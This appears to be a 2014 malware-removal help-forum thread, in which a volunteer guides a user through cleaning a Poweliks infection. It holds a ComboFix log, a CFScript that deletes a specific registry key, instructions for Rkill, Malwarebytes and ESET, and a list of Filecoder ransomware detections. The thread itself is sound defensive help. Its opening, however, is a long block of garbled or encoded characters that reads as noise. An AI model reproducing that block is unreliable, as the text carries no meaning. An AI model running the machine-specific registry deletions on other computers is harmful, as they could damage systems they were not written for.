J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-dXO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kR\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\SH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH%7[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2JXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO JXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXR\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JzO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rR\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\SH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH0\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7Jfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SH,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb%-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz07Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02Sz%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7J&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXR\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JzO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rR\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\Sz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz07Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02Sz%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7J2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-dXO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kR\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\SH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH%7[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2JXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO JXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRDi35\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/1"Kft;#sNf5jOsN.t&].w.j:4I}i4Wjj[|5VVh]is7p`.U1!#ApUmWP!A!}i^W4"$UlpNj#VN-5jgx1V1GCs^Si2&!tT\wo[AUjNKtTNxpNIJp+4x}3N #Mj1}p9sp OWIT.a qYBmsws?st2#jDWtF&!CTwZ4ZOI5V9d VI"K`s9+isVIpA.P3"?jiwf}qHwlh,D]sNf}2wf}y.Mty"t} 9\jTwf0#5&AgP w\jZs/1T#Vl#3M MD&PTwsNfo_pVsa]stf:jwZp`YGCx96]M4liigA4Zqr"jY t+1&p09opVt2mi9;}(jH}iwVp s2mi1KHVFo"jg1IA9~P!^2[&gA}VwI}Zoq5xN4}+t7.Z1GpiqwpUt;}.x9Pi\w13oG}fN\]stBjj";`sV}Ox# ^IPTgWl`oh`jshPVs24`I2}T1~p ,4] 4IeTgWj #~I3s8PyY]:j"f1AY~}x9x] 4IPiw&}yoA`fpSPT.\.`I;jP]"phw.H2O2C""V? sUpisGi:9om2wIK`YIt!xttK tT4;`195js"8i1m+`Yo5iox}T2SPM^lCT^A+!Bk?9tx}`IJ"2D S8bH[!jA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA`2I" Nxp`s$pio~pis~}j4vis^xKu^SITVGJZ*/mjwxp`s~}jwA}jwA} ^3IssA9xw" NxI:Ap?iH~pis~}jwA}iwAp+3S.TVG}0*!mjwx+^9\t!^A}jwA}iwAp`oAUFtU NxK:Ap?iHVKV}a}9A}iwApio~pis~[:V!mjwW.w9\t!^L\s99}TwAp`oA5js~}isA5NAp?iH&KV}a}^jis^x?io~pis~}`s$5jwpH89\t!^D\s99}TXrIssA\!s~}is~p`s$pio&riwa}^vis^x?P)S.TVG}`s$5jwAp`s~}jAD\M89}TlrIssAmxwU Nxp`s$pio~pis~}j9piq^x?PLS.TVGi0*!mjwxp`s~}jwA}jwA} \!?ssAmFIU Nxp`s$pio~pis~}jwA}iwApio~pis~}`s$5jwMl^9\t!aX\s99}TwAp`oAUVAU Nxp`s$pioVNTs~t!wA}iwApfLS.TVG}`s$5jw1}^9\t!^A}jwA}Pj!IssA\!s~}is~?.AO?iH~pis~}jgEiq^x?io~pis~i2IFmjwxp`s~}jx&\M89}TwAp`oAUw: Nxp`s$pio~pis~}jwA}iwApio~pis~}`s/Usa5j0*b\V&6e39j#^(1qOk"F};}is~pjqz.%$j?3wy K~MCqaq?haNHTF~i.A `F"D.0Fgn3^Fi3jcPiwC1:$l"&t.P!FUmy9$pio~IT5SeLxD}#I6KpsI+VFlPVFj1 xAp^I:](45i.\ZjVXYj Hk5js~}i}}HV1dK%$NlT.~#L~/Pqg.1itqp".Me0Nf5jwAp0wb8Vx/e ZF8!"sK s}j!*H#stnm8s]psHjIi*:#3"I[#aC+uH~pis~#^t 1sasK Vm#!Ih V\r8!g5.sak(V9S #N2pqspH 4mHs}7e34A[#aC+uH~pis~i:9G(s0XNwI0#ywr .4Z[qa(j0[tj&tk}i};.ws pV2tlq9g#2wA}iws}!a0IPsKeZt/(sas Ab]F\n .168o\&p^t.ts}:isj8.Z6OjUHbpis~}jjrn#a(I%$m.#}8tVFd&X1oIm#y`hi8c[s0XmZoIj.9oi#};?0F?p#mIft.}jwA}#jY.hX"HUtye.9 :sa5lZsb\x4/P(a9[#aC+_HA5js~iPql?s9O49$4.T}.e.4h83wCI!1~pis~}`}U":l&?`s~j(g&}?OA^U99NbOl1K1;H3slK_V!pf]dr!NA6s^ j#I6IV2alq28}s,U"j85G9a6wHnkDWeTwAp`o5(M,H[TVMI`Fzj#odrisHn." j+g*5iAH5pt;j^bT}f\q_V"Hs~Z}3khPu9q}Z[n}2w+H ..IZ2*K%}.NqAGjy4njsx +U(XN N~}`s$5.T!?At$iZR\Jy92^uwXlqBA\!s~^jY p`s$pioop#.N}9A}P\INTH~pi9qCUYX"f9ZjZY~8s^v6D}H "Il`2j\31x}#VkHUYHVe7NTs5CCj1}VwAps]q13qlJ2N9U!"2?NAAj(~sP9q}P\I.A3!5.sdni.4IwwhjioaIPHM]f9l]rR!N9sGpf5ZPH,%`M1 p`9~}jgsn.ADjV\&I`oAUjqlJfNGKAt3?%$~r3tH}3^qCrR\ro$~I s;ts}253gAp`saJ&"vjjlq[%^yK`B35V1;Hj%W?As$pi}W?it&tFwA}iw9p%37NTtHi.I}(:IDNA} F!82[ `c}+1DmZo3"MItt310KVI/.Va0.3Y;H?R\JTw&pTX0I3s;ty1V5VxAp`2y6ZDZH?RcJTwApZBct2.w}is;I.}*IT(8S"tA}jwA]949j34"}p.+tHY%dF&!pN37[!&h}FAD\T42KA( 9FIH]3I55^w-m+Hg4Tt$J&1c}iwA|"BU}rY~tV5*53A\pZ62Hs~x]f"pH35yj`t;j:NAHUwKIyNhNr1ANTs~t2w;}%\&jT]2+36HjNI/}?O&pNAA (gsP(gq8Txf;0\9!s~HUN"j_IfjpsU4"9\].ws}iws5i(M+3s;}js/tsT!NA5M}&\qCM"!\ow\NGVc5.A&C#5.my3aH"]a}+W7i:\w}jrhhfhappnstvj.uf":129njj&*j&9aiu"wn2s35ka5[!y"+`s%?ub;kit }3w 0yh"]ahot2j.aegm^zn.iu[l^m6jl2c!1yh.$fut}j+mmkqf+1z07|finpk4ahox:rp$w1uawpo}"fx:rasntx9a}jw2}%"a.0^ 9&tdcpa"+uyx3oants~\Mjf]9"5r3]l?Psw}8s2"x9qjjNa[&9*CKAyH!0yH2[xtsoZ}VV5IZ9oli2Ap%3XH:1D\sx:|Ta`j NHn`I+25!?qo7[kR\ fwFPox:lV#*I!Vw}i,DljNFH"sWIus0JF"1}VwApiowpis~}`6/mjwxp`s~}3wA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAn:!bFKD4#^E[9tX8qN&ZI7^9!SrHt8jfs.N!.DJVxF8U"w4 i!? *Zto9-1sgVm }ae jyJ38t^UgW5qaN}Lw_tpIA}q6s}+oZ}i}7^3\F8hg!l 1!j!,a8 Is1kTW}y2TC jX8:j/\"&E}Va/&s}a^UI85q6}mh1Z} 1ZF?SWt+5op/4(pUVZtjY[o?X4.`V![ftXp?X4#i^ENG\Xo?6(#iV!NGHzqq9|jbK !^E[o~!msTa|j3aJ0V;9:OD}Uo0^ZS6HLAy\rSh+G}hdZI7^/3F|wYP+pHZ} !!ixjE[!^Y}jXx4UI^^s,A` jXNsVNt(tEPwX^+4t4wTv}3N^[3I^4V.U5p]^Ih,H]xjEef"w4+X54+V![V.znZ4x5UA8^ jX\y&Et!X/qAHt(M6oC *042N}mh1Npj3kFM93(3zWTBlN!.(pj!dq!x*NV.(p.Z/ Fj98U5yH^T/qF.x8Up.H^!dq#x4Up.\VZw(/44? XZjuIHpU32n?0E?q*y8 DVFZ"hJ/"hSG)/tZhSFPYO5ysT5+4F0PY^nM^!vb*#JIn{l I!UvwQrPb+6,^U\=lE~Z~qbp8mmOm4`+*`N8pm^Wd+cbpAk4pAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-08-12 to 2014-09-12  )))))))))))))))))))))))))))))))
.
.
2014-09-12 16:24 . 2014-09-12 16:30 -------- d-----w- c:\users\hesperia\AppData\Local\temp
2014-09-12 16:24 . 2014-09-12 16:24 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-09-12 00:24 . 2014-08-21 02:44 8581864 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{8F68E643-289D-4C7B-8452-7774FD9BEDE9}\mpengine.dll
2014-09-10 10:08 . 2014-09-05 01:42 444416 ----a-w- c:\windows\system32\aepdu.dll
2014-09-10 10:08 . 2014-09-05 01:38 303104 ----a-w- c:\windows\system32\aeinv.dll
2014-09-10 09:37 . 2014-08-21 02:44 8581864 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2014-09-09 19:01 . 2014-09-09 19:01 -------- d-----w- c:\windows\system32\SPReview
2014-09-09 07:24 . 2014-09-12 07:14 -------- d-----w- C:\FRST
2014-09-09 06:47 . 2014-09-09 06:47 -------- d-----w- c:\program files\TeamViewer
2014-09-09 06:44 . 2014-09-09 06:44 -------- d-----w- c:\program files\Adblock Plus for IE
2014-09-09 06:41 . 2014-09-12 05:10 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-09-09 06:41 . 2014-09-09 06:41 113880 ----a-w- c:\windows\system32\drivers\48230029.sys
2014-09-09 06:40 . 2014-09-09 06:40 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-09-09 06:40 . 2014-05-11 23:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-09 06:40 . 2014-09-09 06:40 -------- d-----w- c:\users\hesperia\AppData\Local\Programs
2014-09-09 06:40 . 2014-09-12 04:59 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-09 06:30 . 2014-09-09 06:35 -------- d-----w- C:\AdwCleaner
2014-09-09 06:28 . 2014-09-12 04:58 -------- d-----w- c:\windows\ERUNT
2014-08-30 01:02 . 2014-08-20 01:38 893248 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{902D1444-72CF-46A3-BD86-54933BA122E6}\gapaengine.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-12 04:59 . 2011-04-29 02:03 113880 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2014-08-20 01:38 . 2012-06-13 01:39 893248 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2014-07-17 10:05 . 2014-07-17 10:05 231800 ----a-w- c:\windows\system32\drivers\MpFilter.sys
2014-07-17 10:05 . 2011-04-27 07:25 95920 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-03-15 98304]
"cAudioFilterAgent"="c:\program files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe" [2010-03-22 496184]
"TPwrMain"="c:\program files\TOSHIBA\Power Saver\TPwrMain.EXE" [2009-11-06 480608]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2010-03-03 742712]
"TWebCamera"="c:\program files\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe" [2010-02-24 2454840]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2010-07-21 1797008]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2010-11-29 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2010-12-13 421160]
"CanonMyPrinter"="c:\program files\Canon\MyPrinter\BJMyPrt.exe" [2009-11-01 2508104]
"CanonSolutionMenu"="c:\program files\Canon\SolutionMenu\CNSLMAIN.exe" [2009-09-03 767312]
"IAStorIcon"="c:\program files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" [2011-10-17 284440]
"ToshibaServiceStation"="c:\program files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" [2011-02-11 1295736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 974432]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2013-05-08 41056]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-04-04 958576]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R3 cfWiMAXService;ConfigFree WiMAX Service;c:\program files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [2010-01-28 185712]
R3 ConfigFree Service;ConfigFree Service;c:\program files\TOSHIBA\ConfigFree\CFSvcs.exe [2009-03-11 46448]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys [2014-07-17 95920]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe [2014-08-22 288120]
R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\system32\Drivers\RtsUStor.sys [2010-02-01 182304]
R3 TOSHIBA HDD SSD Alert Service;TOSHIBA HDD SSD Alert Service;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [2010-02-06 111960]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2010-12-22 1343400]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam.sys [2008-05-06 11520]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2010-03-15 172032]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-10-17 13592]
S2 regi;regi;c:\windows\system32\drivers\regi.sys [2007-04-18 11032]
S2 TeamViewer6;TeamViewer 6;c:\program files\TeamViewer\Version6\TeamViewer_Service.exe [2013-02-19 2417504]
S2 TOSHIBA eco Utility Service;TOSHIBA eco Utility Service;c:\program files\TOSHIBA\TECO\TecoService.exe [2010-03-17 189808]
S2 UNS;Intel® Management & Security Application User Notification Service;c:\program files\Intel\Intel® Management Engine Components\UNS\UNS.exe [2010-03-03 2320920]
S3 CnxtHdmiAudService;Conexant UAA HDMI Function Driver for High Definition Audio Service;c:\windows\system32\drivers\CHDMI32.sys [2010-03-05 516152]
S3 FwLnk;FwLnk Driver;c:\windows\system32\DRIVERS\FwLnk.sys [2009-07-07 7680]
S3 Impcd;Impcd;c:\windows\system32\DRIVERS\Impcd.sys [2010-02-10 132352]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x86.sys [2010-02-23 66600]
S3 PGEffect;Pangu effect driver;c:\windows\system32\DRIVERS\pgeffect.sys [2009-06-23 24064]
S3 TMachInfo;TMachInfo;c:\program files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [2011-02-11 54136]
.
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-12 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-04-27 05:08]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com.au/
TCP: DhcpNameServer = 192.168.1.1
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
AddRemove-TOSHIBA Software Modem - c:\windows\agrsmdel
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-108206)
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:00000009
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-09-13  00:31:42
ComboFix-quarantined-files.txt  2014-09-12 16:31
.
Pre-Run: 577,795,473,408 bytes free
Post-Run: 578,759,012,352 bytes free
.
- - End Of File - - 8BE47EE16E09FA791337008E749810AF
5B5E648D12FCADC244C1EC30318E1EB9
 
 
Looks like it got the things I was worried about.


#9 olgun52

olgun52

  • Malware Response Team
  • 3,784 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:04 PM

Posted 12 September 2014 - 07:34 PM

Looks like it got the things I was worried about.

Yes. There Poweliks virus. New and critical virus.

 

Step 1:

 

CF-script.

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
  • Click Start > Run and in the box that opens type notepad and press enter. Copy/paste the text in the codebox below into it:
Registry::
[-HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}]
[-HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32]
[-HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32]
[HKEY_USERS\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]

RegNull::
[HKEY_USERS\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]

Save this as CFScript.txt, in the same location as ComboFix.exe

CFScriptB-4.gif

Refering to the picture above, drag CFScript into ComboFix.exe

When finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.

 

Step 2:

 

Please download Rkill by Grinler and save it to your desktop.

  • Link 1
    Link 2
  • Double-click on the Rkill desktop icon to run the tool.
  • If using Vista or Windows 7, right-click on it and Run As Administrator.
  • A black DOS box will briefly flash and then disappear. This is normal and indicates the tool ran successfully.
  • If not, delete the file, then download and use the one provided in Link 2.
  • If it does not work, repeat the process and attempt to use one of the remaining links until the tool runs.
  • If the tool does not run from any of the links provided, please let me know.
  • If your antivirus program gives a prompt message, respond positive to allow RKILL to run.
  • If a malware-rogue gives a message regarding RKILL, proceed forward to running RKILL

IF you still have a problem running RKILL, you can download iExplore.exe or eXplorer.exe, which are renamed copies of rkill.com, and try them instead.

When all done, rkill.txt log file will be on your desktop. Copy & Paste contents of Rkill.txt into a new reply.

More Information about Rkill can be found at this link: http://www.bleepingc...opic308364.html

 

 

Please, you must do the following scan immediately.

 

Scan with Malwarebytes Antimalware:

Please download Malwarebytes Anti-Malware to your desktop.

  • Double-click the downloaded setup file and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
  • Launch Malwarebytes Anti-Malware
  • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.

If the program is already installed:

  • Run Malwarebytes Antimalware
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply

 

-------------------------------------------------------------------------------

 

Please send Eset and a fresh FRST log  ---> (FRST.txt and additional.txt)

 

 

Have a nice day.


Best regards
 
paypal.gif
If you wish to show appreciation and support me personally fighting against malware, then you can consider a donation. Thank you. :thumbup2:
Malware fix forum
If I don't reply within 24 hours please PM me!

 


 


#10 tantryl

tantryl
  • Topic Starter

  • Members
  • 31 posts
  • OFFLINE
  •  
  • Local time:05:04 PM

Posted 12 September 2014 - 08:54 PM

The ESET detections had me a little worried until I saw the "threats".

 

Worth noting: when I went to download rkill I had the same symptom that was the first to appear when the problem arrived - IE refuses to download any file at all due to a security setting. Resetting security fixes it (temporarily) and after running these things again it hasn't reappeared. Rkill and MBAM found nothing.

 

C:\Users\All Users\Norton\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Norton\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Norton\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\Users\All Users\Skype\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\Users\All Users\Skype\Plugins\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\Users\All Users\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\Users\All Users\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan
C:\AdwCleaner\Quarantine\C\ProgramData\Windows Genuine Advantage\{CBCBCB86-BA3D-4D93-ADDA-8722F1C63667}\msiexec.exe.vir a variant of Win32/Injector.BLLQ trojan cleaned by deleting - quarantined
C:\FRST\Quarantine\C\ProgramData\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\ProgramData\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\ProgramData\DECRYPT_INSTRUCTION.URL.xBAD Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Norton\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Norton\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Norton\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
